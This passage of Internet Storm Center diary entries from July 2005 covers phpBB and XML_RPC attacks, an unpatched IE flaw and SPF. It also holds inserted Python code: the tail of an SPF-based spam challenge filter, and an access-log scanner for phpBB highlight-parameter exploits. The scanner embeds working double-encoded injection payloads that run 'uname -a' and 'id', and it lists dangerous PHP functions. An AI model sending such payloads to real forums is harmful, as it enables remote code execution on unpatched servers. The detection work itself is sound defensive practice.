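    #    innocent owner of that address, which is exactly the reader's complaint above.
    spf = (msg.get("Received-SPF") or "").strip().lower()
    if spf.startswith(("fail", "softfail")):
        return False, "SPF failure: sender address looks forged, do not challenge it"

    # 4. Rate-limit per sender domain so one spam run cannot turn us into a flood source.
    domain = sender.rsplit("@", 1)[-1].lower()
    if sent[domain] >= MAX_CHALLENGES_PER_DOMAIN:
        return False, f"{sent[domain]} challenges already sent to {domain}: rate limit"

    sent[domain] += 1
    return True, "unknown sender, hand-written mail, SPF not failing: send challenge"


# Constructed sample messages (not real mail).
FORGED_SPAM = (
    "Received-SPF: fail (receiver.example: domain of alice@contributor.example "
    "does not designate 203.0.113.9 as permitted sender)\r\n"
    "From: alice@contributor.example\r\nSubject: cheap watches\r\n\r\nbuy now\r\n"
)
BOUNCE = "Auto-Submitted: auto-replied\r\nFrom: mailer-daemon@other.example\r\nSubject: Undelivered\r\n\r\n"
REAL_MAIL = (
    "Received-SPF: pass (receiver.example: 198.51.100.4 is authorized)\r\n"
    "From: bob@newsender.example\r\nSubject: question about your diary\r\n\r\nHi,\r\n"
)


def simulate_spam_run(count: int) -> int:
    """How many challenges a run of `count` forged messages (no SPF result) would trigger."""
    sent: Counter = Counter()
    challenges = 0
    for i in range(count):
        raw = f"From: user{i}@contributor.example\r\nSubject: hi\r\n\r\nhello\r\n"
        ok, _ = should_challenge(raw, f"user{i}@contributor.example", sent)
        challenges += int(ok)
    return challenges


if __name__ == "__main__":
    sent: Counter = Counter()
    for name, raw, env in [("forged", FORGED_SPAM, "alice@contributor.example"),
                           ("bounce", BOUNCE, "<>"),
                           ("real", REAL_MAIL, "bob@newsender.example")]:
        print(name, should_challenge(raw, env, sent))
    print("challenges from 100 forged messages:", simulate_spam_run(100))
```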





Happy Independence Day to all of my fellow Americans and Happy Monday to everyone else. May we all wake up tomorrow morning to just the normal activity on the net.



Deb Hale


Handler on Duty



haled@pionet.net


Published: 2005-07-03

Possibility for disaster?; Preparing for a storm

Late edition

Possibility for disaster?



At the Internet Storm Center, we sometimes see dark clouds gathering on the horizon. Sometimes it doesn't come to a real storm, sometimes it does. Unlike the real storm centers, we don't have mathematical models to help in our predictions just yet. The main problem is that it would mean we'd have to predict human nature.

This weekend we're seeing one of these possible storms. It's still too insubstantial to actually call it a storm, but the ingredients for the recipe of disaster might be present.

As a first ingredient we have the probing and even at least one worm/botnet on the loose attacking unpatched phpBB installations. Probes we see on patched phpBB boards range from trying the highlight bug to trying to run "uname -a". Attacks on unpatched boards are more varied in nature so far. Add to that the PHP XML_RPC bugs and the Unix-based web server world is clearly under attack this weekend.

As a second ingredient we see the 0-day exploits and the lack of a real patch from Microsoft for javaprxy.dll. This makes the most popular browser potentially seriously vulnerable as this exploit matures.

The final ingredient is timing: in the US it's Independence Day tomorrow, which most probably only leaves a skeleton staff at key places. And which means some of the bad guys out there might seize the opportunity to do their evil with fewer defenders on the line.

We're looking for your opinion, will it mix and brew into a storm or not?

Preparing for the storm



At the ISC we're not convinced it will come to a storm. Considering the reactions we got from you so far are mostly pointing to a storm, action might be the right thing to call for.

As with any real storm, there are things one can do, even on short notice.

A quick overview:

- patch phpBB, even if you cannot do the full upgrade, the critical part of the patch is only one line that you need to change now. Find the one line here: .

- patch XML_RPC: "pear upgrade XML_RPC" should do the trick, or visit
site for more details.

- use the workarounds from Microsoft's
. Take special care to apply the suggested actions. Alternatively some sites will prefer to switch browsers to those that cannot do ActiveX to start with.

As always, the more publicity this gets and the more action is taken, the less likely it becomes that the storm will actually happen. That's the drawback of our self-defeating prophecy.

It does feel a bit like crying wolf, but taking precautions cannot hurt.



--

Swa Frantzen

Published: 2005-07-02

New IE Exploit PoC; phpBB notes; new book

New IE Exploit PoC



On Thursday, Microsoft released a bulletin describing a new unpatched vulnerability in javaprxy.dll. FrSIRT also released a bulletin yesterday. Microsoft updated their bulletin last night with some additional workarounds, including requiring prompting for all ActiveX controls and/or disabling javaprxy entirely. For those of you who must continue to use IE as a browser, we highly recommend that you look at these workarounds. This morning the folks at FrSIRT released a proof-of-concept that opens a shell listening on a high TCP port, so we expect active exploitation attempts in the very near future.

phpBB notes


In case it wasn't clear in our diaries earlier this week, we are seeing active exploit attempts against the viewtopic vulnerability in phpBB 2.0.15, so if you haven't upgraded to 2.0.16, you need to do so immediately.

New book: Forensics


This isn't really a book review, but I picked up the latest (I believe) book in the Hacking Exposed series, Hacking Exposed Computer Forensics. So far, as with all the others that I've read in the series, it seems very well done with a lot of excellent information. Speaking of forensics, there was an interesting comment made on the forensics mailing list, and I'm wondering what others think. Tobin Craig states "Can I suggest that the proliferation of substandard [forensic] examiners is the result of treating computer forensics as an offshoot of information security?" and "Perhaps it might be time for the information security arena to stop regarding computer forensics as a subset of IT investigation, and see it instead as a completely separate entity." I'm not sure that I entirely agree (nor entirely disagree) with these sentiments, but I'd like to hear from our readers.

Happy Holidays


To our Canadian friends, I hope you had a great holiday yesterday. For our American readers, I hope Monday is a great day for barbecues and fireworks.

Obligatory Tour de France comment: Also, congrats to Lance on an excellent prologue (a strong second place), I doubt that this is where Jan planned to be as the Tour begins. Ah, well. The next 3 weeks should be fun.


-----------------------

Jim Clausing, gro.snas.csi@gnisualcj
Published: 2005-07-01

Be on the Lookout for PHP compromises; Will New Anti-Spam Protocols Work?; Internet Survival Time by Sophos; phpBB: anti-Santy worm again?

Late edition (Kyle Haugsness on duty):

Team Effort Today



Today's shift was really a team effort. Thanks to Swa, Lorna, Deb,
and Scott for covering different hours of the day. -Kyle



Be on the Lookout for PHP compromises



This is a call to all the network and system security folks out there...
Please be on the lookout for web-based intrusions happening in your
environments. There have recently been major vulnerabilities discovered
in phpBB and the XML_RPC libraries, which we have reported in the last
two days.



It's very likely that these vulnerabilities will be utilized to
compromise systems. Try to be vigilant about securing your environment
and reviewing your IDS alerts for attacks.
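The probes against viewtopic.php mentioned above (and the "highlight bug" probes seen on patched boards, up to attempts to run "uname -a") leave a recognisable trace in ordinary web server access logs, so they can be reviewed even without an IDS. The script below is an added example, not code from the ISC diary, from phpBB or from any worm: it parses Apache combined-format log lines, decodes the highlight parameter once (as PHP's $_GET does) and then a second time (as phpBB 2.0.15's extra urldecode() call did, which is what let a double-encoded quote, %2527, become a real quote and reach the evaluated preg_replace), and flags requests that break out of the string or call a shell function. The log lines, addresses, paths and user agents are constructed for the example.

```python
"""Find phpBB viewtopic.php 'highlight' exploit probes in access logs.

Added example. Detection rests on the public phpBB 2.0.15 flaw: the
'highlight' value was URL-decoded a second time by viewtopic.php, so a
double-encoded single quote (%2527) ended up inside PHP code that
preg_replace() with the /e modifier evaluated.
"""
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample lines in Apache combined log format. Addresses come
# from documentation ranges; the requests are illustrative, not captured.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jul/2005:10:12:01 +0000] "GET /phpBB2/viewtopic.php?t=5&highlight=%2527%252esystem(%2527uname%2520-a%2527)%252e%2527 HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
192.0.2.11 - - [01/Jul/2005:10:12:05 +0000] "GET /phpBB2/viewtopic.php?t=12&highlight=kernel HTTP/1.1" 200 8891 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jul/2005:10:13:44 +0000] "GET /forum/viewtopic.php?p=3&highlight=%2527%252Epassthru(chr(105)%252Echr(100))%252E%2527 HTTP/1.0" 200 4412 "-" "lwp-trivial/1.41"
198.51.100.8 - - [01/Jul/2005:10:14:02 +0000] "GET /phpBB2/viewtopic.php?t=9&highlight=don%27t HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# PHP functions an attacker typically reaches once the quote breaks out of
# the string that the /e preg_replace() evaluates.
DANGEROUS = re.compile(
    r"\b(system|passthru|exec|shell_exec|popen|eval|fwrite|fopen|include)\s*\(",
    re.I,
)


def render_chr(s):
    """Fold PHP chr(N).chr(M)... chains into the literal string they build,
    so an analyst sees 'id' instead of chr(105).chr(100)."""
    return re.sub(r"chr\((\d+)\)(?:\.(?=chr\())?",
                  lambda m: chr(int(m.group(1))), s)


def inspect_target(target):
    """Decode the highlight parameter twice and return a finding dict, or None.

    once  = what PHP's $_GET delivered to viewtopic.php
    twice = what phpBB 2.0.15's extra urldecode() turned it into
    """
    url = urlparse(target)
    if "viewtopic.php" not in url.path.lower():
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "highlight" not in params:
        return None
    once = params["highlight"][0]
    twice = unquote(once)

    reasons = []
    if once != twice:
        reasons.append("double-encoded highlight value")
    if "'" in twice:
        reasons.append("single quote after second decode")
    dangerous = DANGEROUS.search(twice)
    if dangerous:
        reasons.append("calls %s()" % dangerous.group(1).lower())

    # A quote that only appears after the *second* decode, or a call to a
    # shell/eval function, is the exploit pattern. A plain apostrophe in a
    # search term ("don't") survives one decode unchanged and is not flagged.
    quote_breakout = once != twice and "'" in twice
    if not (dangerous or quote_breakout):
        return None
    return {"decoded": twice, "rendered": render_chr(twice), "reasons": reasons}


def scan_log(text):
    """Return one finding per suspicious request, in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = inspect_target(m.group("target"))
        if finding:
            finding.update(ip=m.group("ip"), ts=m.group("ts"),
                           target=m.group("target"))
            hits.append(finding)
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["ip"], h["ts"], "->", h["rendered"], "|", "; ".join(h["reasons"]))
```

Run it against a real access log by replacing SAMPLE_LOG with the file contents. A board already upgraded to 2.0.16 still logs these requests with a 200 status, since the patched script simply no longer evaluates the value, so the number of flagged lines per day is a usable indicator of how much scanning is going on; on an unpatched board, any flagged line is a reason to pull the box for forensics.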



Will New Anti-Spam Protocols Work?



Not to be negative or anything... But it appears that the SPF (Sender
Policy Framework) and Sender-ID anti-spam approaches have been approved
as "experimental drafts" by IETF. So there is a new poll on the right
with my question. How long before the spammers defeat these methods?



Here are the relevant links:

SPF: http://www.ietf.org/internet-drafts/draft-schlitt-spf-classic-02.txt

SPF status:
https://datatracker.ietf.org/public/pidtracker.cgi?command=view_id&dTag=12662&rfc_flag=0




Sender-ID:
http://www.ietf.org/internet-drafts/draft-lyon-senderid-core-01.txt

Sender-ID status:
https://datatracker.ietf.org/public/pidtracker.cgi?command=view_id&dTag=12542&rfc_flag=0




Internet Survival Time by Sophos



Anti-virus company Sophos published their own statistic regarding
"internet survival time". Their number was 12 minutes. The survival
time currently reported by dshield.org is 31 minutes. Their story also
has some interesting statistics on the number of viruses in the first
half of 2005 compared to last year. But don't let it spoil your
weekend. If you are in the security field professionally, just think of
it as job security.



http://www.sophos.com/pressoffice/pressrel/uk/midyearroundup2005.html


Early edition

See also the

phpBB: anti-Santy worm resurrection?



With the release of the latest phpBB patch, we are seeing a reappearance of what looks like anti-Santy worm scanning for vulnerable hosts.

If you have been broken into using this method in recent days, we'd love to have a look at the dropped files to see if this is still the anti-Santy worm or something else using the same scanning engine.

(Swa Frantzen on early duty)